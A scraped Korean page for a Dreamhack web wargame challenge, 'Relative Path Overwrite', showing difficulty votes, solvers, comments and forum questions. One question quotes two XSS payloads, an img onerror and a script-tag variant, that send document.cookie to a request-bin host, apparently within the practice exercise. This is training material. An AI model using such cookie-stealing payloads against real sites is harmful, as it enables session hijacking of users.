학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
기업 서비스로 이동하기 >
LEVEL 2
Relative Path Overwrite
web
1508
741
2022.03.31. 11:54:01
로그인 하고 문제 풀기
문제 정보
풀이
31
난이도 투표
116
질문
3
최근 풀이자
741
댓글
13
문제 설명
Description
Exercise: Relative Path Overwrite에서 실습하는 문제입니다.
문제 수정 내역
2023.08.10
bot.py
수정, Dockerfile 제공
Translate
난이도 투표
116
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 24
taolaai
대표 업적 없음
LEVEL 2에 투표했습니다.
18일 전
슈크림빵
대표 업적 없음
LEVEL 2에 투표했습니다.
1개월 전
lmao
대표 업적 없음
LEVEL 2에 투표했습니다.
1개월 전
Horizon#
웹해킹 중급자
LEVEL 3에 투표했습니다.
2개월 전
DarkSpade
대표 업적 없음
LEVEL 2에 투표했습니다.
2개월 전
질문
3
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
img태그와 script태그
index.php/?page=vuln¶m=<img src=@ onerror=location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie> 이건 드림핵 강의에서 제공한 img태그를 사용한 페이로드입니다 index.php/?page=vuln¶m=<script>location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie;</script> 이건 제가 입력한 script태그를 이용한 페이로드입니다 img태그는 requestbin으로 요청이 가는데 script태그를 사용하면 요청이 가지 않습니다 무엇이 문제인가요..?
ㅤㅤㅤㅤ
답변
1
추천
0
8개월 전
base 태그
혹시 base태그가 안 먹히는데 이유가 있을까용
mooji
답변
1
추천
0
2년 전
report.php의 flag 셋팅 질문 (스포가 될 수 있으니 풀고 보세요~)
일반적으로 여타 다른 문제들 보면 report 페이지에서 admin으로 로그인해서 가던가, flag를 셋팅해서 가던가 하는 코드가 보이는데요. 본 문제는 report 페이지를 통해 flag를 유출하는 것은 맞지만, report 페이지에서 flag를 셋팅해서 쿠키로 가져간다는 코드가 주어진 코드에 없더라고요. 이런 경우, 그냥 일반적으로 report 페이지를 통해 푸는 것이니, report 페이지로 취약 페이지 요청하고 cookie 확인해봐야지. 라고 유추를 해야 하는 건가요? 아니면 제가 flag가 어디 셋팅되어 있다는 것을 놓친걸까요?
l000wk3y
답변
2
추천
0
3년 전
«
‹
1
›
»
LEVEL 2
Relative Path Overwrite
web
1508
741
2022.03.31. 11:54:01
로그인 하고 문제 풀기
출제자 정보
Dreamhack
대표 업적 없음
Dreamhack official account
First Blood!
as3617
워게임 고인물
출제된 지
5시간
만에 풀이 완료!
최근 풀이자
741
두둗탁
웹해킹 고인물
6일 전
Hacklipse
대표 업적 없음
9일 전
눅눅한건빵칩
대표 업적 없음
9일 전
juseong
대표 업적 없음
17일 전
taolaai
대표 업적 없음
18일 전
김민곤
대표 업적 없음
20일 전
bonds
대표 업적 없음
22일 전
BYTE255
웹해킹 고인물
28일 전
solaL
.HACK 2025 참가자
1개월 전
고간디
시스템 해킹 전문가
1개월 전
«
‹
1
2
3
4
5
›
»
댓글
13
W0_hyuk
Lucky 7
3개월 전
왜 쓸모없는 페이지가 많을까?
Translate
jihu5
시스템 해킹 입문
4개월 전
봇은 신박하네용
Translate
어제의 나보다 나아진 오늘을 희망하며
웹해킹 고인물
7개월 전
어제의 나보다 나아진 오늘을 희망하며
Translate
해킹배우고시퍼요
대표 업적 없음
2년 전
더하기를 주의하라
Translate
O_F
대표 업적 없음
2년 전
welcome
Translate
사용자
소통요정
3년 전
Welcome to rpo world~
Translate
l000wk3y
공부벌레
3년 전
연계하는 취약점에 따른 태그를 잘 생각해봐야 합니다.
Translate
yoobi
워게임 고인물
3년 전
good
Translate
weakness
Cloud 9
3년 전
ez
Translate
sinse100
대표 업적 없음
3년 전
just like session
Translate
«
‹
1
2
›
»
댓글 13